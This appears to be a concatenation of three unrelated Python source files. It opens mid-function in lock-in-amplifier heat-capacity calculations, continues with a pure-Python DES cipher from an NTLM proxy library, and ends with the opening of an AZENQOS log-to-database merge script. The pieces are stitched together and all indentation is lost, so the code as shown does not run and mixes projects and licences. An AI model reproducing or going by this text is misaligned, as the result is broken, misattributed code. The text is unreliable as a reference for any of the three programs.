Yadd2=(3.*I0amp*Ro+4.*numpy.abs(I1)*Ro*numpy.cos(phi0))*tcr*dT/3./angfreq1w
F2=V2-Xadd2-1j*Yadd2-I2*R
else:
F2=V2
mc=tcr*numpy.abs(I1)**2*I0amp*R*Ro*1.5/numpy.abs(F2)/angfreq1w
if returnall:
if applyVmods:
return angfreq1w, phi0, I0amp, I1, I2, V2, Xadd2, Yadd2, F2, mc
else:
return angfreq1w, I0amp, I1, V2, F2, mc
else:
return mc
def mCp_3w(VhX, VhY, I0X, I0Y, I1X, I1Y, IhX, IhY, dT, R, Ro, tcr, freq1w, applyVmods=True, returnall=False):
V3=VhX+1j*VhY
I1=I1X+1j*I1Y
angfreq1w=2.*numpy.pi*freq1w
if applyVmods:
I3=IhX+1j*IhY
I0amp=numpy.sqrt(I0X**2+I0Y**2)
phi0=-1.*numpy.angle(I1)
Xadd3=numpy.abs(I1)*Ro*tcr*dT/4./angfreq1w*numpy.sin(phi0)
Yadd3=(8.*I0amp*Ro+9.*numpy.abs(I1)*Ro*numpy.cos(phi0))*tcr*dT/12./angfreq1w
F3=V3-Xadd3-1j*Yadd3-I3*R
else:
F3=V3
mc=tcr*numpy.abs(I1)**3*R*Ro/8./numpy.abs(F3)/angfreq1w
if returnall:
if applyVmods:
return angfreq1w, phi0, I0amp, I1, I3, V3, Xadd3, Yadd3, F3, mc
else:
return angfreq1w, I1, V3, F3, mc
else:
return mc
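# Hedged usage sketch for mCp_2w/mCp_3w above (values are hypothetical lock-in readings):
# the *X/*Y arguments are the in-phase/quadrature lock-in components (scalars or numpy arrays),
# dT is the temperature rise, R and Ro the measured and reference resistances, tcr the
# temperature coefficient of resistance and freq1w the 1-omega drive frequency:
# mc2 = mCp_2w(VhX, VhY, I0X, I0Y, I1X, I1Y, IhX, IhY, dT=1.0, R=110.0, Ro=100.0, tcr=2.5e-3, freq1w=10.0)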
|
|
# This file is part of 'NTLM Authorization Proxy Server' http://sourceforge.net/projects/ntlmaps/
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/> or <http://www.gnu.org/licenses/lgpl.txt>.
import six
from .U32 import U32
from .des_data import des_SPtrans, des_skb
def c2l(c):
"char[4] to unsigned long"
l = U32(c[0])
l = l | (U32(c[1]) << 8)
l = l | (U32(c[2]) << 16)
l = l | (U32(c[3]) << 24)
return l
def l2c(l):
"unsigned long to char[4]"
c = []
c.append(int(l & U32(0xFF)))
c.append(int((l >> 8) & U32(0xFF)))
c.append(int((l >> 16) & U32(0xFF)))
c.append(int((l >> 24) & U32(0xFF)))
return c
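# Round-trip sketch for c2l/l2c: l2c(c2l([0x01, 0x02, 0x03, 0x04])) == [1, 2, 3, 4]
# (c2l packs the 4 bytes little-endian into one U32, l2c unpacks them again)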
def D_ENCRYPT(tup, u, t, s):
L, R, S = tup
# print 'LRS1', L, R, S, u, t, '-->',
u = (R ^ s[S])
t = R ^ s[S + 1]
t = ((t >> 4) + (t << 28))
L = L ^ (des_SPtrans[1][int((t) & U32(0x3f))] |
des_SPtrans[3][int((t >> 8) & U32(0x3f))] |
des_SPtrans[5][int((t >> 16) & U32(0x3f))] |
des_SPtrans[7][int((t >> 24) & U32(0x3f))] |
des_SPtrans[0][int((u) & U32(0x3f))] |
des_SPtrans[2][int((u >> 8) & U32(0x3f))] |
des_SPtrans[4][int((u >> 16) & U32(0x3f))] |
des_SPtrans[6][int((u >> 24) & U32(0x3f))])
# print 'LRS:', L, R, S, u, t
return (L, R, S), u, t, s
def PERM_OP(tup, n, m):
"tup - (a, b, t)"
a, b, t = tup
t = ((a >> n) ^ b) & m
b = b ^ t
a = a ^ (t << n)
return (a, b, t)
def HPERM_OP(tup, n, m):
"tup - (a, t)"
a, t = tup
t = ((a << (16 - n)) ^ a) & m
a = a ^ t ^ (t >> (16 - n))
return a, t
shifts2 = [0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0]
class DES:
KeySched = None # des_key_schedule
def __init__(self, key_str):
self.KeySched = des_set_key(key_str)
def decrypt(self, str):
# block - UChar[]
block = []
for i in six.iterbytes(str):
block.append(i)
# print block
block = des_ecb_encrypt(block, self.KeySched, 0)
res = b''
for i in block:
res = res + six.int2byte(i)
return res
def encrypt(self, plaintext):
# block - UChar[]
block = []
for i in plaintext:
block.append(i)
block = des_ecb_encrypt(block, self.KeySched, 1)
res = b''
for i in block:
res += six.int2byte(i)
return res
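# Usage sketch for the DES class above (single 8-byte ECB block as used for NTLM hashing;
# the key bytes are hypothetical and are used as-is - no parity adjustment is applied here):
# cipher = DES(b'\x01\x23\x45\x67\x89\xab\xcd\xef')
# ct = cipher.encrypt(b'ABCDEFGH')  # 8-byte ciphertext
# pt = cipher.decrypt(ct)           # == b'ABCDEFGH'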
def des_encript(input, ks, encrypt):
# input - U32[]
# output - U32[]
# ks - des_key_schedule - U32[2][16]
# encrypt - int
# l, r, t, u - U32
# i - int
# s - U32[]
l = input[0]
r = input[1]
t = U32(0)
u = U32(0)
r, l, t = PERM_OP((r, l, t), 4, U32(0x0f0f0f0f))
l, r, t = PERM_OP((l, r, t), 16, U32(0x0000ffff))
r, l, t = PERM_OP((r, l, t), 2, U32(0x33333333))
l, r, t = PERM_OP((l, r, t), 8, U32(0x00ff00ff))
r, l, t = PERM_OP((r, l, t), 1, U32(0x55555555))
t = (r << 1) | (r >> 31)
r = (l << 1) | (l >> 31)
l = t
s = ks # ???????????????
# print l, r
if encrypt:
for i in range(0, 32, 4):
rtup, u, t, s = D_ENCRYPT((l, r, i + 0), u, t, s)
l = rtup[0]
r = rtup[1]
rtup, u, t, s = D_ENCRYPT((r, l, i + 2), u, t, s)
r = rtup[0]
l = rtup[1]
else:
for i in range(30, 0, -4):
rtup, u, t, s = D_ENCRYPT((l, r, i - 0), u, t, s)
l = rtup[0]
r = rtup[1]
rtup, u, t, s = D_ENCRYPT((r, l, i - 2), u, t, s)
r = rtup[0]
l = rtup[1]
# print l, r
l = (l >> 1) | (l << 31)
r = (r >> 1) | (r << 31)
r, l, t = PERM_OP((r, l, t), 1, U32(0x55555555))
l, r, t = PERM_OP((l, r, t), 8, U32(0x00ff00ff))
r, l, t = PERM_OP((r, l, t), 2, U32(0x33333333))
l, r, t = PERM_OP((l, r, t), 16, U32(0x0000ffff))
r, l, t = PERM_OP((r, l, t), 4, U32(0x0f0f0f0f))
output = [l]
output.append(r)
l, r, t, u = U32(0), U32(0), U32(0), U32(0)
return output
def des_ecb_encrypt(input, ks, encrypt):
# input - des_cblock - UChar[8]
# output - des_cblock - UChar[8]
# ks - des_key_schedule - U32[2][16]
# encrypt - int
# print input
l0 = c2l(input[0:4])
l1 = c2l(input[4:8])
ll = [l0]
ll.append(l1)
# print ll
ll = des_encript(ll, ks, encrypt)
# print ll
l0 = ll[0]
l1 = ll[1]
output = l2c(l0)
output = output + l2c(l1)
# print output
l0, l1, ll[0], ll[1] = U32(0), U32(0), U32(0), U32(0)
return output
def des_set_key(key):
# key - des_cblock - UChar[8]
# schedule - des_key_schedule
# register unsigned long c,d,t,s;
# register unsigned char *in;
# register unsigned long *k;
# register int i;
# k = schedule
# in = key
k = []
c = c2l(key[0:4])
d = c2l(key[4:8])
t = U32(0)
d, c, t = PERM_OP((d, c, t), 4, U32(0x0f0f0f0f))
c, t = HPERM_OP((c, t), -2, U32(0xcccc0000))
d, t = HPERM_OP((d, t), -2, U32(0xcccc0000))
d, c, t = PERM_OP((d, c, t), 1, U32(0x55555555))
c, d, t = PERM_OP((c, d, t), 8, U32(0x00ff00ff))
d, c, t = PERM_OP((d, c, t), 1, U32(0x55555555))
d = (((d & U32(0x000000ff)) << 16) | (d & U32(0x0000ff00)) | ((d & U32(0x00ff0000)) >> 16) | (
(c & U32(0xf0000000)) >> 4))
c = c & U32(0x0fffffff)
for i in range(16):
if (shifts2[i]):
c = ((c >> 2) | (c << 26))
d = ((d >> 2) | (d << 26))
else:
c = ((c >> 1) | (c << 27))
d = ((d >> 1) | (d << 27))
c = c & U32(0x0fffffff)
d = d & U32(0x0fffffff)
s = des_skb[0][int((c) & U32(0x3f))] | \
des_skb[1][int(((c >> 6) & U32(0x03)) | ((c >> 7) & U32(0x3c)))] | \
des_skb[2][int(((c >> 13) & U32(0x0f)) | ((c >> 14) & U32(0x30)))] | \
des_skb[3][int(((c >> 20) & U32(0x01)) | ((c >> 21) & U32(0x06)) | ((c >> 22) & U32(0x38)))]
t = des_skb[4][int((d) & U32(0x3f))] | \
des_skb[5][int(((d >> 7) & U32(0x03)) | ((d >> 8) & U32(0x3c)))] | \
des_skb[6][int((d >> 15) & U32(0x3f))] | \
des_skb[7][int(((d >> 21) & U32(0x0f)) | ((d >> 22) & U32(0x30)))]
# print s, t
k.append(((t << 16) | (s & U32(0x0000ffff))) & U32(0xffffffff))
s = ((s >> 16) | (t & U32(0xffff0000)))
s = (s << 4) | (s >> 28)
k.append(s & U32(0xffffffff))
schedule = k
return schedule
|
|
infostr = '''azm_db_merge version 1.0 Copyright (c) 2016 Freewill FX Co., Ltd. All rights reserved.'''
usagestr = '''
Merge (import) AZENQOS Android .azm
test log files that contain SQLite3 database files (azqdata.db) into a target
central database (currently PostgreSQL, MS-SQL and SQLite3; roadmap: MySQL).\n
Please read SETUP.txt and INSTRUCTIONS.txt for usage examples.
Copyright: Copyright (C) 2016 Freewill FX Co., Ltd. All rights reserved.
'''
import subprocess
from subprocess import call
import sys
import signal
import argparse
import importlib
import time
import debug_helpers
from debug_helpers import dprint
import zipfile
import os
import shutil
import uuid
import traceback
import fnmatch
import hashlib
import glob
import psutil
from datetime import timedelta
from datetime import datetime
from datetime import tzinfo
class timezone(tzinfo):
"""UTC"""
offset_seconds = None
def __init__(self, offset_seconds):
self.offset_seconds = offset_seconds
def utcoffset(self, dt):
return timedelta(seconds=self.offset_seconds)
def tzname(self, dt):
return "custom_timezone_offset_seconds_{}".format(self.offset_seconds)
def dst(self, dt):
return timedelta(seconds=self.offset_seconds)
# https://stackoverflow.com/questions/51913210/python-script-with-timezone-fails-when-back-ported-to-python-2-7
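# Usage sketch for the timezone class above (timestamp and offset are hypothetical; the offset
# is given in seconds, so a millisecond offset from the db must be divided by 1000 first):
# dt = datetime.fromtimestamp(1468000000, timezone(7 * 3600))  # a UTC+7 log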
# global vars
g_target_db_types = ['postgresql','mssql','sqlite3']
g_check_and_dont_create_if_empty = False
def parse_cmd_args():
parser = argparse.ArgumentParser(description=infostr, usage=usagestr,
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--azm_file',help='''An AZENQOS Android .azm file (or directory that contains multiple .azm files)
that contains the SQLite3 "azqdata.db" to merge/import. If you want azm_db_merge to try multiple full paths and use whichever exists first, separate the paths with commas.
(a .azm is actually a zip file)''', required=True)
parser.add_argument('--unmerge',
action='store_true',
help="un-merge mode: remove all rows of this azm from target_db.",
default=False)
parser.add_argument('--folder_mode_stop_on_first_failure',
action='store_true',
help="""If --azm_file supplied was a folder,
by default it would not stop in the first failed azm.
Set this to make it stop at the first .azm that failed to merge/import.
""",
default=False)
parser.add_argument('--target_db_type', choices=g_target_db_types,
help="Target DBMS type ", required=True)
parser.add_argument(
'--pg_port', help='''Specify postgres port number''',
type=int,
default=5432,
required=False
)
parser.add_argument('--target_sqlite3_file',
help="Target sqlite3 file (to create) for merge", required=False)
parser.add_argument('--docker_postgres_server_name',
help="Same as --pg_host option. If azm_db_merge is running in a 'Docker' container and postgres+postgis is in another - use this to specify the server 'name'. NOTE: The azm file/folder path must be in a shared folder (with same the path) between this container and the postgres container as we're using the COPY command that requires access to a 'local' file on the postgres server.",
required=False,
default=None)
parser.add_argument('--pg_host',
help="Postgres host (default is localhost)",
required=False,
default='localhost')
parser.add_argument('--server_user',
help="Target login: username.", required=True)
parser.add_argument('--server_password',
help="Target login: password.", required=True)
parser.add_argument('--server_database',
help="Target database name.", required=True)
parser.add_argument('--check_and_dont_create_if_empty',
action='store_true',
help="Force check and omit table create if table is empty. This check, however, can make processing slower than default behavior.",
default=False)
parser.add_argument('--sqlite3_executable',
help="Full path to sqlite3 executable.",
default="sqlite3")
parser.add_argument('--mssql_odbc_driver',
help="Driver string for SQL Server",
default="{SQL Server Native Client 11.0}")
parser.add_argument('--dump_to_file_mode',
action='store_true',
help="""Set this to force full dump of sqlite3 db to .sql file
first before reading and parsing.
(We found that this is a bit slower and takes some disk space).""",
default=False)
parser.add_argument('--exclude_tables',
help="""List tables to exclude from merge - separated by commas. Default tables 'spatial_ref_sys,geometry_columns' are always ommitted.""",
default='')
parser.add_argument('--only_tables',
help="""List tables to "import only these tables". Default tables 'logs,' are always imported.""",
default='')
parser.add_argument('--import_geom_column_in_location_table_only',
action='store_true',
help="""Omit 'geom' geometry column in all tables except the 'location' table.
By default, all tables contain the 'geom' geometry column for convenient use with QGIS.
However, all other tables have 'pos_id' that can be used with 'log_hash' to join/match with the 'location' table manually
(or as a view) if user decides to avoid this redundant data.""",
default=False)
parser.add_argument('--call_preprocess_func_in_module_before_import',
help="""Specify a python module (.py file) that has the function 'preprocess(dir_processing_azm)' to be called before importing the 'azqdata.db' file. If you have multiple modules/functions to preprocess - simply make and specify a module that calls all of them.""",
default=None)
parser.add_argument('--dry',
help="""specify the string 'true' (without quotes) to skip the target database procedure - designed just for looping to call the "preprocess" func mode (without unzipping the azm) where real import is not required like using with legacy AzqGen.exe calls to import to legacy mysql db with legacy schemas.""",
default='',
required=False)
parser.add_argument('--move_imported_azm_files_to_folder',
help='''If specified, successfully imported azm files would get moved to that folder.''',
default=None,
required=False)
parser.add_argument('--move_failed_import_azm_files_to_folder',
help='''If specified, failed-to-import azm files would get moved to that folder.''',
default=None,
required=False)
parser.add_argument('--pg_schema',
help='''If specified, will create/use this schema for all tables.''',
default="public",
required=False)
parser.add_argument('--daemon_mode_rerun_on_folder_after_seconds',
help='''If specified, azm_db_merge will keep running and re-process the same folder (specified with '--azm_file') again after the specified number of seconds.''',
default=None,
required=False)
parser.add_argument('--add_imei_id_to_all_tables',
action='store_true',
help="""Add log device's IMEI to all rows in all tables.""",
default=False)
parser.add_argument('--debug',
action='store_true',
help="""Set debug (verbose) mode printing.
""",
default=False)
parser.add_argument('--keep_temp_dir',
action='store_true',
help="""Dont delete temp dirs (that holds csv dumps) at end for further manual analysis.
""",
default=False)
parser.add_argument('--dump_parquet',
action='store_true',
help="""Use Pandas to dump each table to Parquet files.
""",
default=False)
parser.add_argument('--get_schema_shasum_and_exit',
action='store_true',
help="""Compute the schema of the azqdata.db inside the specified azm and exit. Example:
python azm_db_merge.py --target_db_type sqlite3 --azm_file example_logs/358096071732800\ 2_1_2017\ 13.12.49.azm --server_user "" --server_password "" --server_database "" --target_sqlite3_file merged.db --get_schema_shasum_and_exit
""",
default=False)
parser.add_argument('--pg10_partition_by_month',
action='store_true',
help="""For postgresql v10 only - when create tables - do declartive partitioning by month like '2017_06' etc""",
default=False)
parser.add_argument('--pg10_partition_index_log_hash',
action='store_true',
help="""For postgresql v10 only - when creating partitions, set log_hash as the index of the table""",
default=False)
args = vars(parser.parse_args())
return args
def is_dump_schema_only_for_target_db_type(args):
# now force bulk so always schema only
return True
"""
def popen_sqlite3_dump(args):
params = [
args['sqlite3_executable'],
args['file']
]
if (is_dump_schema_only_for_target_db_type(args)):
params.append(".schema")
else:
params.append(".dump")
print("popen_sqlite3_dump params: "+str(params))
sub = subprocess.Popen(
params,
bufsize = -1, # -1 means default of OS. If no buf then it will block sqlite and very slow
shell=False,
stdout=subprocess.PIPE,
#stderr=subprocess.STDOUT
#stderr=sys.stdout.fileno()
)
dprint("subporcess popen done")
return sub
"""
# Dump db to a text sql file
def dump_db_to_sql(dir_processing_azm):
dumped_sql_fp = "{}_dump.sql".format(args['file'])
cmd = [
"{}".format(args['sqlite3_executable']),
"{}".format(args['file']),
".out {}".format(dumped_sql_fp.replace("\\", "\\\\")),
".schema" if (is_dump_schema_only_for_target_db_type(args)) else ".dump"
]
print("cmd: ",cmd)
ret = call(cmd, shell=False)
print("conv ret: "+str(ret))
if (ret != 0):
print("dump db to {} file failed - ABORT".format(dumped_sql_fp))
return None
print("dump db to {} file success".format(dumped_sql_fp))
return dumped_sql_fp
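# For reference, the call above is equivalent to running the sqlite3 CLI by hand
# (illustrative file names; ".dump" replaces ".schema" when a full data dump is requested):
#   sqlite3 azqdata.db ".out azqdata.db_dump.sql" ".schema"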
# global vars for handle_sql3_dump_line
g_is_in_insert = False
g_is_in_create = False
g_insert_buf = ""
g_create_buf = ""
# global module functions
g_connect_function = None
g_check_if_already_merged_function = None
g_create_function = None
g_commit_function = None
g_close_function = None
# g_insert_function = None
# parse multi-line statements into single statements (for insert/create), detect commit commands, and call the related funcs of the target db type module
def handle_sql3_dump_line(args, line):
global g_is_in_insert
global g_is_in_create
global g_insert_buf
global g_create_buf
global g_insert_function
if g_is_in_insert is True:
g_insert_buf = g_insert_buf + line
if line.strip().endswith(");"):
handle_ret = g_insert_function(args, g_insert_buf.strip())
g_is_in_insert = False
g_insert_buf = None
# dprint("multi line insert END:")
return handle_ret
else:
# dprint("multi line insert still not ending - continue")
return True
if g_is_in_create:
g_create_buf += line.strip()
if line.strip().endswith(");"):
line = g_create_buf
print("multi line create END") # \ng_is_in_create final line:", line
else:
return True
is_omit_table = False
if line.startswith("CREATE TABLE ") or g_is_in_create:
g_is_in_create = False
# in case the user is re-importing an already 'sqlite3 merged' azqdata.db, there will be CREATE TABLE IF NOT EXISTS lines which we created earlier - restore them to plain CREATE TABLE...
line = line.replace("CREATE TABLE IF NOT EXISTS ","CREATE TABLE ",1)
if not line.strip().endswith(");"):
print("multi line create START")
g_is_in_create = True
g_create_buf = line.strip()
return True
table_name = line.split(" (")[0].replace("CREATE TABLE ","").replace("\"","")
dprint("check table_name is_omit_table: "+table_name)
is_omit_table = table_name in args['omit_tables_array'] or table_name == "azq_internal_types"
dprint("is this table in --omit_tables ? "+table_name+" = "+str(is_omit_table))
if args['only_tables_on']:
dprint("--only_tables on - check if we should exclude this table: "+table_name)
is_omit_table = True
if table_name in args['only_tables_array']:
is_omit_table = False
dprint("--only_tables on - exclude this table? "+table_name+" = "+str(is_omit_table))
if (
line.startswith("CREATE TABLE ") and
not line.startswith("CREATE TABLE android_metadata") and
not ("_layer_statistics" in line) and
not is_omit_table
):
# get table name:
table_name = line.split(" ")[2].replace("\"", "")
''' put where in select at create csv instead - delete where would be a cmd and slower too
if not args['unmerge']:
#print "delete all rows with wrong modem timestamp before 48h of log_start_time and log_end_time for this table:", table_name
sqlstr = "delete from {} where time < '{}' or time > '{}' or time is null;".format(table_name, args['log_data_min_time'], args['log_data_max_time'])
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
#print "call cmd:", cmd
try:
outstr = subprocess.check_output(cmd).decode()
#print "delete from ret outstr:", outstr
except Exception as se:
print "WARNING: delete pre y2k rows from table failed exception:", se
'''
print(("\nprocessing: create/alter/insert for table_name: "+table_name))
print("processing create at handler module...") # always create - flag override
handle_ret = g_create_function(args, line)
elif (line.startswith("COMMIT;")):
print("\nprocessing: commit")
handle_ret = g_commit_function(args, line)
return handle_ret
elif (line.startswith("INSERT INTO")):
raise Exception("ABORT: currently bulk insert mode is used so only scheme should be dumped/read... found INSERT INTO - abort")
table_name = line.split(" ")[2].replace("\"", "")
if (table_name == "android_metadata"):
return True #omit
line_stripped = line.strip()
if line_stripped.endswith(");"):
# dprint("single line insert")
handle_ret = g_insert_function(args, line_stripped)
return handle_ret
else:
dprint("multi line insert START")
g_is_in_insert = True
g_insert_buf = line
return True
else:
# dprint "omit line: "+line
return True
return False
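# Illustrative dump lines as handled above (hypothetical 'events' table):
#   CREATE TABLE "events" (time TEXT,   <- does not end with ");" so it is buffered
#   name TEXT);                         <- ends with ");" so g_create_function is called
#   COMMIT;                             <- g_commit_function is called
# INSERT INTO lines raise an exception here because bulk-insert mode dumps the schema only.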
# unzip azm file to a tmp processing folder
def unzip_azm_to_tmp_folder(args):
dprint("unzip_azm_to_tmp_folder 0")
print("args['azm_file']: "+args['azm_file'])
azm_fp = os.path.abspath(args['azm_file'])
print("azm_fp: "+azm_fp)
if os.path.isfile(azm_fp):
pass
else:
raise Exception("INVALID: - azm file does not exist at given path: "+str(azm_fp)+" - ABORT")
dir_azm_unpack = os.path.dirname(azm_fp)
print("dir_azm_unpack: "+dir_azm_unpack)
azm_name_no_ext = os.path.splitext(os.path.basename(azm_fp))[0]
print("azm_name_no_ext: "+azm_name_no_ext)
if 'TMP_GEN_PATH' in os.environ:
dir_azm_unpack = os.environ['TMP_GEN_PATH']
print("dir_azm_unpack using TMP_GEN_PATH:", dir_azm_unpack)
TMPFS_DIR = "/tmpfs"
GB_BYTES = 1024 * 1024 * 1024
MIN_TMPFS_REMAIN_SPACE_BYTES = 8 * GB_BYTES
if os.path.isdir(TMPFS_DIR) and os.system("touch /tmpfs/test_touch") == 0:
cleanup_old_tmpfs_tmp_dirs_with_invalid_pid_files()
statvfs = os.statvfs(TMPFS_DIR)
remain_space = statvfs.f_frsize * statvfs.f_bfree
if remain_space > MIN_TMPFS_REMAIN_SPACE_BYTES:
print("using /tmpfs because remain_space {} MIN_TMPFS_REMAIN_SPACE_BYTES {}".format(remain_space,
MIN_TMPFS_REMAIN_SPACE_BYTES))
dir_azm_unpack = TMPFS_DIR # to speed up the preprocess sqlite work step, which was blocking on disk io for heavy tests on the test0 server - if the proc crashes this will get auto cleaned up by the cleanup_old_tmpfs_tmp_dirs_with_invalid_pid_files() func in preprocess_azm.py
else:
print("NOT using /tmpfs because remain_space {} MIN_TMPFS_REMAIN_SPACE_BYTES {}".format(remain_space,
MIN_TMPFS_REMAIN_SPACE_BYTES))
dir_processing_azm = os.path.join(dir_azm_unpack, "tmp_azm_db_merge_"+str(uuid.uuid4())+"_"+azm_name_no_ext.replace(" ","-")) # replace 'space' in azm file name
args['dir_processing_azm'] = dir_processing_azm
dprint("unzip_azm_to_tmp_folder 1 dir_processing_azm:", dir_processing_azm)
gen_pidfile_in_tmp_dir(dir_processing_azm)
# try to clear the tmp processing folder just in case it exists from a manual unzip or previous failed imports
try:
shutil.rmtree(dir_processing_azm)
except Exception as e:
estr = str(e)
if ("cannot find the path specified" in estr or "No such file or" in estr):
pass
else:
print(("rmtree dir_processing_azm: "+str(e)))
raise e
dprint("unzip_azm_to_tmp_folder 2")
os.mkdir(dir_processing_azm)
dprint("unzip_azm_to_tmp_folder 3")
try:
azm = zipfile.ZipFile(args['azm_file'],'r')
azm.extract("azqdata.db", dir_processing_azm)
'''
try:
# handle malformed db cases
import pandas as pd
import sqlite3
dbfile = os.path.join(dir_processing_azm, "azqdata.db")
dbcon = sqlite3.connect(dbfile)
integ_check_df = pd.read_sql("PRAGMA integrity_check;", dbcon)
try:
dbcon.close() # we dont use dbcon in further azm_db_merge code, and db file can be removed if integ not ok - avoid file locks
except:
pass
print "azm_db_merge: sqlite db integ_check_df first row:", integ_check_df.iloc[0]
if integ_check_df.iloc[0].integrity_check == "ok":
print "azm_db_merge: sqlite3 db integrity check ok"
else:
print "azm_db_merge: sqlite3 db integrity check failed - try recover..."
dump_ret = subprocess.call("sqlite3 '{}' .dump > '{}.txt'".format(dbfile, dbfile),shell=True)
print "azm_db_merge: dump_ret:", dump_ret
if dump_ret != 0:
print "WARNING: azm_db_merge: recov corrupt sqlite db file - failed to dump sqlite db file"
else:
os.remove(dbfile)
import_ret = subprocess.call("sqlite3 '{}' < '{}.txt'".format(dbfile, dbfile), shell=True)
print "azm_db_merge: recov corrupt db file import ret:", import_ret
except:
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
print "WARNING: check malformed db exception:", exstr
'''
if args['get_schema_shasum_and_exit']:
print("get_schema_shasum_and_exit start")
sha1 = hashlib.sha1()
#print "get_schema_shasum_and_exit 1"
dbfile = os.path.join(dir_processing_azm,"azqdata.db")
#print "get_schema_shasum_and_exit 2"
cmd = [args['sqlite3_executable'],dbfile,".schema"]
print("call cmd:", cmd)
schema = subprocess.check_output(cmd).decode()
#print "get_schema_shasum_and_exit 3"
sha1.update(schema)
#print "get_schema_shasum_and_exit 4"
print(str(sha1.hexdigest())+" is the sha1 for the schema of azqdata.db inside azm: "+args['azm_file'])
print("get_schema_shasum_and_exit done")
azm.close()
cleanup_tmp_dir(dir_processing_azm)
exit(0)
azm.close()
except Exception as e:
try:
cleanup_tmp_dir(dir_processing_azm)
except:
pass
raise Exception("Invalid azm_file: azm file does not contain azqdata.db database - exception: "+str(e))
dprint("unzip_azm_to_tmp_folder 4")
args['file'] = os.path.join(dir_processing_azm, "azqdata.db")
return dir_processing_azm
def cleanup_tmp_dir(dir_processing_azm):
# clear tmp processing folder
attempts = list(range(5)) # 0 to 4
imax = len(attempts)
print("cleanup_tmp_dir: ",dir_processing_azm)
if dir_processing_azm != None and os.path.exists(dir_processing_azm) and os.path.isdir(dir_processing_azm):
pass
else:
return
for i in attempts:
try:
# print("cleaning up tmp dir...")
shutil.rmtree(dir_processing_azm)
break
# print("cleanup tmp_processing_ dir done.")
except Exception as e:
print(("warning: attempt %d/%d - failed to delete tmp dir: %s - dir_processing_azm: %s" % (i, imax, e,dir_processing_azm)))
time.sleep(0.01) # sleep 10 millis
pass
def check_azm_azq_app_version(args):
# check version of AZENQOS app that produced the .azm file - must be at least 3.0.587 (see MIN_APP_V* below)
MIN_APP_V0 = 3
MIN_APP_V1 = 0
MIN_APP_V2 = 587
sqlstr = "select log_app_version from logs" # there is always only 1 ver of AZENQOS app for 1 azm - and normally 1 row of logs per azm too - but limit just in-case to be future-proof
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
outstr = subprocess.check_output(cmd).decode().strip()
try:
args["azm_apk_version"] = "0.0.0"
outstr = outstr.replace("v","") # replace 'v' prefix - like "v3.0.562" outstr
print("azm app version outstr:", outstr)
parts = outstr.split(".")
v0 = int(parts[0]) * 1000 * 1000
v1 = int(parts[1]) * 1000
v2 = int(parts[2])
args["azm_apk_version"] = v0 + v1 + v2
if (args["azm_apk_version"] >= MIN_APP_V0*1000*1000 + MIN_APP_V1*1000 + MIN_APP_V2):
pass
else:
print("WARNING: azm too old - azm file must be from AZENQOS apps with versions {}.{}.{} or newer.".format(MIN_APP_V0,MIN_APP_V1,MIN_APP_V2))
except:
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
print("WARNING: check azm app version exception:", exstr)
return outstr
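# Worked example of the packed version check above: an azm reporting "v3.0.600" is parsed to
# 3*1000*1000 + 0*1000 + 600 = 3000600, which is >= the minimum 3*1000*1000 + 0*1000 + 587 = 3000587,
# so no warning is printed.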
def mv_azm_to_target_folder(args):
mv_target_folder = args['move_imported_azm_files_to_folder']
if not mv_target_folder is None:
if not os.path.exists(mv_target_folder):
os.makedirs(mv_target_folder)
azm_fp = os.path.abspath(args['azm_file'])
target_fp = os.path.join(mv_target_folder,os.path.basename(azm_fp))
try:
os.remove(target_fp)
os.remove(target_fp+"_output.txt")
except:
pass
print("move_imported_azm_files_to_folder: mv {} to {}".format(azm_fp,target_fp))
os.rename(azm_fp, target_fp)
try:
os.rename(azm_fp+"_output.txt", target_fp+"_output.txt")
except:
pass
def process_azm_file(args):
proc_start_time = time.time()
ret = -9
use_popen_mode = True
sql_dump_file = None
try:
dir_processing_azm = None
dry_str = args['dry']
dry_str = dry_str.strip().lower()
dry_mode = (dry_str == "true")
print("dry_mode setting: ",dry_mode)
if dry_mode:
print("dry_mode - dont unzip azm for azqdata.db - let preprocess func handle itself")
else:
print("normal import mode")
dir_processing_azm = unzip_azm_to_tmp_folder(args)
args['dir_processing_azm'] = dir_processing_azm
preprocess_module = args['call_preprocess_func_in_module_before_import']
if not preprocess_module is None:
preprocess_module = preprocess_module.replace(".py","",1)
print("get preprocess module: ", preprocess_module)
importlib.import_module(preprocess_module)
mod = sys.modules[preprocess_module]
preprocess = getattr(mod, 'preprocess')
print("exec preprocess module > preprocess func")
preprocess(dir_processing_azm,args['azm_file'])
if dry_mode:
print("dry_mode - end here")
mv_azm_to_target_folder(args)
return 0
app_ver = check_azm_azq_app_version(args)
print("app_ver:", app_ver)
assert app_ver
args['app_ver'] = app_ver
args['app_ver_newer_than_in_pg'] = False
args['need_check_remote_cols'] = True
try:
import redis
redis_cache = redis.Redis(host='redis', port=6379)
pg_newest_azm_app_ver = redis_cache.get("pg_newest_azm_app_ver").decode()
print("pg_newest_azm_app_ver:", pg_newest_azm_app_ver)
if pg_newest_azm_app_ver:
if app_ver > pg_newest_azm_app_ver:
print("case: pg_newest_azm_app_ver and (app_ver > pg_newest_azm_app_ver)")
args['app_ver_newer_than_in_pg'] = True
args['need_check_remote_cols'] = args['app_ver_newer_than_in_pg']
else:
print("NOT case: pg_newest_azm_app_ver and (app_ver > pg_newest_azm_app_ver)")
args['app_ver_newer_than_in_pg'] = False
args['need_check_remote_cols'] = args['app_ver_newer_than_in_pg']
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("redis check pg_newest_azm_app_ver excepition:", exstr)
print("args['app_ver_newer_than_in_pg']:", args['app_ver_newer_than_in_pg'])
print("args['need_check_remote_cols']:", args['need_check_remote_cols'])
